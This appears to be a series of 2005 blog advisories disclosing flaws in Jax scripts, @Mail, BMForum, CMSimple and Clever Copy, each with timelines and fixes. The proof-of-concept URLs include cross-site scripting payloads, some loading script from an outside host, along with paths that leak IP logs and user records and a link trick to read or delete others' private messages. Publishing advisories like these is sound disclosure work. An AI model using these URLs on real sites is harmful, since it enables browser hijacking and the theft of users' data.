Dreamweaver templates<br />(Template Editor) <br /> <br /><br /><br />###################<br />1-Products affected<br />###################<br /><br />Jax Guestbook ==> Cross-Site Scripting and information disclosure.<br />Jax Petitionbook ==> Cross-Site Scripting and information disclosure.<br />Jax Newsletter ==> Cross-Site Scripting and information disclosure.<br />Jax LinkLists ==> Cross-Site Scripting and information disclosure.<br />Jax Calendar ==> Cross-Site Scripting.<br />Jax DWT Editor ==> Cross-Site Scripting.<br /><br />##################<br />2- Jax Guestbook<br />##################<br /><br />Cross-Site Scripting and information disclosure:<br /><br />http://[victim]/guestbook/jax_guestbook.php?page=2&language=<br />english&guestbook_id=0&gmt_ofs=0[XSS-CODE]<br /><br /><br />http://[victim]/jax_guestbook.php?page=2&language=english<br />[XSS-CODE]&guestbook_id=0&gmt_ofs=0<br /><br />http://[victim]/guestbook/jax_guestbook.php?page=2<br />[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0<br /><br />http://[victim]/guestbook/jax_guestbook.php?mailto=<br />9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]<br /><br /><br />http://[victim]/guestbook/guestbook<br /> // clients ip who have post a firm in guestbook<br /><br />http://[victim]/guestbook/guestbook_ips2block <br />//list of ips banned<br /><br />http://[victim]/guestbook/ips2block <br />//list of ips banned<br /><br />http://[victim]/guestbook/formmailer/logfile.csv <br />// ips ,from users send via formmail.php script.<br /><br />################<br />versions<br />###############<br /><br />Jax Guestbook v3.1<br />Jax Guestbook v3.31<br /><br />###################<br />3- Jax Petitionbook<br />###################<br /><br />Cross-Site Scripting and information disclosure:<br /><br />http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]<br /><br />http://[victim]/petitionbook/shrimp_petition.php?page=3<br />&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0<br /><br />http://[victim]/petitionbook/shrimp_petition.php?page=3<br />[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0<br /><br /><br />http://[victim]/petitionbook/formmailer.log<br />// all ip , and message what all users sent via formmail<br /><br /><br />http://[victim]/petitionbook/ips2block <br />//all ips banned<br /><br />http://[victim]/petitionbook/petitionbook <br />//all ips of people have signed the petition<br /><br /><br /><br />#################<br />4- Jax Newsletter <br />#################<br /><br />Cross-Site Scripting and information disclosure:<br /><br />http://[victim]/newsletter/jax_newsletter.php?language=<br />German[XSS-CODE]&ml_id=1<br /><br />http://[victim]/newsletter/sign_in.php?do=sign_in<br />&language=german[XSS-CODE]&ml_id=1&ml_id=1<br /><br />http://[victim]/newsletter/archive.php?<br />language=spanish[XSS-CODE]<br /><br />http://[victim]/newsletter/logs/jnl_records <br />// information disclosure form users ,direct request<br />to this file reveals:<br /><br />"email","hash","mail_format","gender","nick","mode",<br />"groups","action","time","ip","age","profession",<br />"nationality" from registered users.<br /><br />############<br />versions<br />############<br /><br />Jax Newsletter v2.14<br />Jax Newsletter v2.10<br /><br />#################<br />5- Jax LinkLists<br />#################<br /><br />Cross-Site Scripting and information disclosure:<br /><br />http://[victim]/linklists/jax_linklists.php?<br />language=English[XSS-CODE]<br /><br />http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]<br /><br />http://[victim]/linklists/suggestions.csv <br />// direct request disclose ip of client who<br />have suggest a link.<br /> <br />#############<br />versions<br />#############<br /><br />Jax LinkLists v1.1<br />Jax LinkLists v1.0<br /><br /><br />#################<br />6- Jax Calendar <br />#################<br /><br />Cross-Site Scripting:<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005<br />[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0<br />9437c00badaf419eb0db5&cal_id=0&language=spanish&<br />gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-<br />%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-<br />+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8<br />[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba<br />daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=<br />d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18<br />%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im<br />+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e<br />b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d<br />ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t<br />itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet<br />ischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_<br />id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d<br />ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t<br />itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet<br />ischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_<br />id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d<br />ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t<br />itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne<br />tischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_<br />id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d<br />ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t<br />itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne<br />tischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_<br />id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d<br />ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t<br />itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne<br />tischen+Feld<br /><br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_<br />id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.<br />2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t<br />itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne<br />tischen+Feld<br /><br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2<br />&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_<br />id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.<br />2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls<br />ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe<br />ld[XSS-CODE]<br /><br /><br /><br />http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&<br />cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]<br /> <br />// all variables affected by XSS flaws<br /><br />http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2<br />&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]<br /><br /> // all variables affected by XSS flaws<br /><br />http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2<br />&cal_id=0&language=german&gmt_ofs=-1&view=d30<br /><br /> // all variables afected by XSS flaws<br /><br /><br /><br />##############<br />versions<br />##############<br />Jax Calendar 1.34<br />Jax Calendar 1.33<br /><br /><br />#################<br />7- Jax DWT Editor <br />#################<br /><br />Cross-Site Scripting:<br /><br />http://[victim]/dwt_editor/dwt_editor.php?language=english<br />[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor<br /><br /><br />http://[victim]/dwt_editor/dwt_editor.php?language=english<br />&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor<br /><br /><br />http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=<br />%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=<br />german&area=textbereich2[XSS-CODE]<br /><br /><br />##############<br />versions<br />##############<br /><br />Jax DWT Editor v1.0 <br /><br /><br />###################<br />8- Timeline<br />###################<br /><br />discovered:27-07-2005<br />Vendor notify:04-08-2005<br />vendor response:04-08-2005<br />disclosure:05-08-2005<br /><br />#################### €nd #############################<br /><br />Thnx to estrella to be my ligth.<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1122565112657242842005-07-28T13:00:00.000-07:002005-08-02T01:08:05.813-07:00@Mail multiple variable cross-site scripting#############################################<br />@Mail multiple variable cross-site scripting<br />vendor url:http://www.atmail.com<br />Advisory:http://lostmon.blogspot.com/2005/07/<br />mail-multiple-variable-cross-site.html<br />vendor notify:yes exploit available: yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=18337" target="_BLANK">18337</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18338" target="_BLANK">18338</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=183379" target="_BLANK">18339</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18340" target="_BLANK">18340</a><br />Secunia: <a href="http://secunia.com/advisories/16252/" target="_BLANK">SA16252</a><br />BID: <a href="http://securityfocus.com/bid/14408" target="_BLANK">14408</a><br />##############################################<br /><br /><br />@Mail is a feature rich Email solution that allows users to access<br />email-resources via the web or a variety of wireless devices. The<br />software incorporates a complete email-server package to manage<br />and host user email at your domain(s)<br /><br /><br />@Mail contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate<br />multiple variables upon submission to multiple scripts.This could<br />allow a user to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server, leading to a loss of integrity.<br /><br />#############<br />versions<br />#############<br /><br />@Mail 4.03 WebMail for Windows <br />@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /<br /><br />it is also posible other versions are vulnerable.<br /><br />#################<br />solution<br />#################<br /><br />Apply patch for version 4.11.<br />http://calacode.com/patch.pl<br /><br />#################<br />Timeline<br />#################<br /><br />Discovered:02-07-2005<br />vendor notify:27-07-2005<br />vendor response:28-07-2005<br />disclosure:28-07-2005<br /><br /><br />##################<br />Proof of comcepts<br />##################<br /><br />For exploit this flaws, need a client login and for exploiting<br />all flaws in /webadmin/ need a admin login.<br /><br />###################<br />princal.pl<br />###################<br /><br />http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4<br /><br />http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]<br /><br />http://[victim]/printcal.pl?type=4[XSS-CODE]<br /><br />###################<br />task.pl<br />###################<br /><br />http://[victim]/task.pl?func=todo[XSS-CODE]<br /><br />###################<br />compose.pl<br />####################<br /><br />http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.<br />[victim].com%3A2%2C&folder=Sent&cache=&func=reply<br />&type=reply[XSS-CODE]<br /><br />http://[victim]/compose.pl?spellcheck=112253846919856.sc.new<br />&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]<br /><br />http://[victim]/compose.pl?spellcheck=112253846919856.sc.new<br />&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r<br /><br />http://[victim]/compose.pl?func=new&To=<br />lala@lala.es&Cc=&Bcc=[XSS-CODE]<br /><br /><br />http://[victim]/compose.pl?func=new&To=<br />lala@lala.es&Cc=[XSS-CODE]&Bcc=<br /><br />http://[victim]/compose.pl?func=new&To=<br />lala@lala.es[XSS-CODE]&Cc=&Bcc=<br /><br />###################<br />webadmin/filter.pl<br />###################<br /><br />http://[victim]/webadmin/filter.pl?func=<br />viewmailrelay&Order=IPaddress[XSS-CODE]<br /><br />http://[victim]/webadmin/filter.pl?func=filter<br />&Header=blacklist_from&Type=1[XSS-CODE]&View=1<br /><br />http://[victim]/webadmin/filter.pl?func=filter<br />&Header=blacklist_from[XSS-CODE]&Type=1&View=1<br /><br />http://[victim]/webadmin/filter.pl?<br />func=filter&Header=whitelist_from&Type=0&Display=1<br />&Sort=value[XSS-CODE]&Type=1&View=1<br /><br /><br /><br />######################## €nd ##########################<br /><br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1122370636085146722005-07-27T06:35:00.000-07:002005-08-05T03:06:27.796-07:00Clever Copy Unauthorized read & delete Private Messages################################################<br />Clever Copy Unauthorized read & delete Private Messages<br />vendor url:http://clevercopy.bestdirectbuy.com<br />advisory:http://lostmon.blogspot.com/2005/07/<br />clever-copy-unauthorized-read-delete.html<br />vendor notify: yes exploit available:yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18509" target="_BLANK">18509</a><br />Secunia : <a href="http://secunia.com/advisories/16236/" target="_BLANK">SA16236</a><br />BID:<a href="http://securityfocus.com/bid/14397" target="_BLANK">14397</a><br />################################################<br /><br /><br />Clever Copy is a free, fully scalable web site portal and news posting<br />system.You can run it as a very simple blog or ramp it up to a full<br />Content Management System<br /><br />Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.<br /><br />The flaw is done wen a authenticated user try to access directly to a<br />especial url to gain unauthorized access to private messages.<br /><br />############<br />versions<br />############<br /><br />Clever Copy 2.0<br />Clever Copy 2.0a<br /><br />###############<br />Solution<br />###############<br /><br />No solution at this time !!<br /><br />###################<br />Timeline<br />###################<br /><br />Discovered: 25-07-2005<br />Vendor notify:26-07-2005<br />Disclosure:27-07-2005<br /><br />###################<br />proof of concept<br />###################<br /><br />First we must be logged for have access to private messages<br />and go to this url:<br /><br />http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass<br /><br />or<br /><br />http://[victim]/readpm.php?op=read&ID=2&user=waltrapass<br /><br />and we look the message 2 from waltrapass user :)<br /><br />op= read or del<br />id= id from message what we like to look<br />name= username of user was send the private message<br />( this is not necessary to view or delete a message)<br />user= username from user what we try to look their PM<br /><br />for delete a message we can go to similar url:<br /><br />http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass<br /><br />or<br /><br />http://[victim]/readpm.php?op=del&ID=2&user=waltrapass<br /><br />##################### €nd #############################<br /><br />thnxs to estrella to be my ligth<br />thnxs to http://www.osvdb.org/<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1122451313349512652005-07-27T00:59:00.000-07:002005-07-29T01:07:43.726-07:00Multiple Cross site scripting in BMForum################################################<br />Multiple Cross site scripting in BMForum <br />vendor url:http://www.bmforum.com/<br />Advisore:http://lostmon.blogspot.com/2005/07/<br />multiple-cross-site-scripting-in.html<br />Vendor notify:yes Exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=18306" target="_BLANK">18306</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18307" target="_BLANK">18307</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18308" target="_BLANK">18308</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18309" target="_BLANK">18309</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18310" target="_BLANK">18310</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18311" target="_BLANK">18311</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18312" target="_BLANK">18312</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18313" target="_BLANK">18313</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18314" target="_BLANK">18314</a><br />Secunia: <a href="http://secunia.com/advisories/16224/" target="_BLANK">SA16224</a><br />BID: <a href="http://securityfocus.com/bid/14396" target="_blank">14396</a><br />################################################<br /><br /><br />BMForum contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate<br />multiple variables upon submission to multiple scripts.This could<br />allow a user to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server, leading to a loss of integrity.<br /><br /><br /><br />####################<br />VERSIONS<br />####################<br /><br />BMForum Datium! 3.0 RC4<br />BMForum Datium! 3.0 RC3 <br />BMForum Datium! 3.0 RC2<br />BMForum Datium! 3.0 RC1<br />BMForum Plus! 3.0 RC4<br />BMForum Plus! 3.0 RC3 <br />BMForum Plus! 3.0 RC2 <br />BMForum Plus! 3.0 RC1<br />BMForum Plus!MX 3.0.0.5 <br />BMForum Plus! 2.6.1<br /><br /><br />###################<br />Solution:<br />###################<br /><br />No solution at this time.<br /><br />###################<br />Timeline:<br />###################<br /><br />Discovered: 21-07-2005<br />vendor notify:25-07-2005<br />Disclosure:27-07-2005<br /><br />###################<br />Proof of XSS<br />####################<br /><br />####################<br />topic.php<br />####################<br /><br />http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]<br />http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2<br />http://[VICTIM]/topic.php?filename=1923[XSS-CODE]<br /><br />#################<br />forums.php<br />#################<br /><br />http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]<br />http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=<br />http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=<br />http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]<br /><br /><br />###################<br />post.php<br />###################<br /><br />http://[VICTIM]/post.php?forumid=2\[XSS-CODE]<br /><br />###################<br />announcesys.php<br />###################<br /><br />http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]<br /><br />#################<br />Others<br />#################<br /><br />http://[VICTIM]/datafile/regipbans.php //ips baned.<br />http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.<br />http://[VICTIM]/post_global.php //full path disclosure<br />http://[VICTIM]/bmb/datafile/bbslog2.txt //data disclosure<br />http://[VICTIM]/bmb/bbslog.txt // data disclosure<br /><br />################### €nd ######################<br /><br />thnx to estrella to be my ligth.<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1121944329508154792005-07-21T04:09:00.000-07:002005-07-26T01:50:33.823-07:00CMSimple 'search' variable XSS##############################################<br />CMSimple 'search' variable XSS<br />Vendor urL:http://www.cmsimple.dk/<br />Advisory:http://lostmon.blogspot.com/2005/07/<br />cmsimple-search-variable-xss.html<br />vendor fix:http://www.cmsimple.dk/<br />forum/viewtopic.php?t=2470<br />Vendor confirmed:YES exploit available:yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18128" target="_BLANK">18128</a><br />Secunia: <a href="http://secunia.com/advisories/16147/" target="_BLANK">SA16147</a><br />BID: <a href="http://securityfocus.com/bid/14346" target="_BLANK">14346</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014556" target="_BLANK">1014556</a><br />##############################################<br /><br /><br /><br />CMSimple is a simple content management system; for the smart<br />maintenance of small commercial or private sites.<br />It is simple - small - smart!<br /><br /><br />CMSimple contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate<br />'search' variable upon submission to 'index.php' script.This could<br />allow a user to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server, leading to a loss of integrity.<br /><br />Index.php file contains only a include to cmsimple/cms.php file.<br /><br /><br />#############<br />VERSIONS<br />#############<br /><br />CMSimple 2.4 and earlier versions<br /><br /><br />#############<br />Solution<br />#############<br /><br />vendor fix:<br />http://www.cmsimple.dk/forum/viewtopic.php?t=2470<br /><br />Fix: <br /><br />function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search; <br /><br />should be replaced with: <br /><br />function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search)); <br /><br />Will be fixed in next beta.<br /><br />#############<br />Timeline<br />#############<br /><br />discovered: 13-07-2005<br />vendor notify:20-07-2005<br />vendor response:21-07-2005<br />vendor fix:21-07-2005<br />disclosure:21-07-2005<br /><br /><br />################<br />Proof of concept<br />################<br /><br />http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br /><br /><br />http://[victim]/?function=search&search=[XSS-CODE]<br /><br />http://[victim]/?&print&function=search&search=[XSS-CODE]<br /><br />http://[victim]/?License&function=search&search=[XSS-CODE]<br /><br />http://[victim]/?Resellers&function=search&search=[XSS-CODE]<br /><br />http://[victim]/?&guestbook&function=search&search=[XSS-CODE]<br /><br /><br />###################### €nd #########################<br /><br />Thnx to estrella to be my ligth<br />thnx to http://www.drorshalev.com/ for hosting 'js.js' script <br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1121676986158861002005-07-18T15:05:00.000-07:002005-08-01T01:26:58.556-07:00Clever copy Path disclosure and XSS################################################<br />Clever copy Path disclosure and XSS<br />vendor url:http://clevercopy.bestdirectbuy.com<br />advisory:http://lostmon.blogspot.com/2005/07/<br />clever-copy-path-disclosure-and-xss.html<br />vendor notify: yes exploit available:yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18349">18349</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18350">18350</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18351">18351</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18352">18352</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18353">18353</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18354">18354</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18355">18355</a>,<br /><a href="http://osvdb.org/displayvuln.php?osvdb_id=18356">18356</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18357">18357</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18358">18358</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18359">18359</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18360">18360</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18361">18361</a><br />Secunia: <a href="http://secunia.com/advisories/16236/" target="_BLANK">SA16236</a><br />BID:<a href="http://securityfocus.com/bid/14395" target="_BLANK">14395</a><br />################################################<br /><br />Clever Copy is a free, fully scalable web site portal and news posting<br />system.You can run it as a very simple blog or ramp it up to a full<br />Content Management System<br /><br />Clever Copy contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate<br />'searchtype' and 'searchterm' variables upon submission to<br />'results.php' and 'categorysearch.php' scripts.This could allow a user<br />to create a specially crafted URL that would execute arbitrary code in<br />a user's browser within the trust relationship between the browser and<br />the server, leading to a loss of integrity<br /><br />##############<br />VERSIONS<br />##############<br /><br />Clever Copy version 2.0a<br />Clever Copy version 2.0<br /><br />##############<br />SOLUTION<br />##############<br /><br />No solution at this time<br /><br />##############<br />TIMELINE<br />##############<br /><br />Discovered: 15-07-2005<br />Vendor notify: 18-07-2005<br />Vendor response: 18-07-2005<br />Disclosure: 19-07-2005<br /><br />##############<br />EXPLOITS<br />##############<br /><br />http://[VICTIM]/results.php?searchtype="><script src="<br />http://www.drorshalev.com/dev/injection/js.js"></script><br />category&searchterm=Announcements<br /><br />http://[VICTIM]/results.php?searchtype=category&searchterm="><br /><scriptsrc="http://www.drorshalev.com/dev/injection/js.js&<br />quot;></script>Announcements<br /><br /><br />http://[VICTIM]/results.php?start=0&searchtype="><script<br />src="http://www.drorshalev.com/dev/injection/js.js"><<br />/script>category&searchterm=Announcements<br /><br />http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=<br />Announcements="><script src="http://www.drorshalev<br />.com/dev/injection/js.js"></script><br /><br />http://[VICTIM]/categorysearch.php?star=0&searchtype="><<br />script src="http://www.drorshalev.com/dev/injection/js.js<br />"></script>category&searchterm=Announcements<br /><br />http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&<br />searchterm=Announcements"><script src="http://<br />www.drorshalev.com/dev/injection/js.js"></script><br /><br />################################<br />direct request path disclosure:<br />################################<br /><br />http://[VICTIM]/ticker.php<br />http://[VICTIM]/menu.php<br />http://[VICTIM]/banned.php<br />http://[VICTIM]/endlayout.php<br />http://[VICTIM]/randomhlinesblock.php<br />http://[VICTIM]/showlast.php<br />http://[VICTIM]/showlast5class1.php<br />http://[VICTIM]/showlast5phorum.php<br />http://[VICTIM]/showlast5phorumblock.php<br />http://[VICTIM]/showlastforumbb2.php<br />http://[VICTIM]/showlastforumbb2block.php<br /><br /><br />######################## €nd #############################<br /><br />Thnx to estrella to be my ligth<br />thnx to http://www.drorshalev.com/ for hosting 'js.js' script <br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1121271219681661282005-07-15T09:03:00.000-07:002005-07-18T00:47:26.386-07:00Clever copy 'calendar.php' 'yr' variable cross site scripting################################################<br />Clever copy 'calendar.php' 'yr' variable cross site scripting<br />vendor url:http://clevercopy.bestdirectbuy.com<br />advisory:http://lostmon.blogspot.com/2005/07/<br />clever-copy-calendarphp-yr-variable.html<br />vendor notify: yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=17919" target="_BLANK">17919</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014492" target="_BLANK">1014492</a><br />BID: <a href="http://securityfocus.com/bid/14278" target="_BLANK">14278 </a><br />################################################<br /><br />Clever Copy is a free, fully scalable web site portal and news posting<br />system.You can run it as a very simple blog or ramp it up to a full<br />Content Management System<br /><br />Clever Copy contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate 'yr'<br />variable upon submission to 'calendar.php' script.This could allow a<br />user to create a specially crafted URL that would execute arbitrary<br />code in a user's browser within the trust relationship between<br />the browser and the server, leading to a loss of integrity<br /><br />##############<br />VERSIONS<br />##############<br /><br />Clever Copy version 2.0a<br />Clever Copy version 2.0<br /><br />##############<br />SOLUTION<br />##############<br /><br />No solution at this time<br /><br />##############<br />TIMELINE<br />##############<br /><br />Discovered: 12-07-2005<br />Vendor notify: 13-07-2005<br />Vendor response:14-07-2005<br />Disclosure: 15-07-2005<br /><br />##############<br />EXPLOIT<br />##############<br /><br />http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br />######################## €nd #############################<br /><br />Thnx to estrella to be my ligth<br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
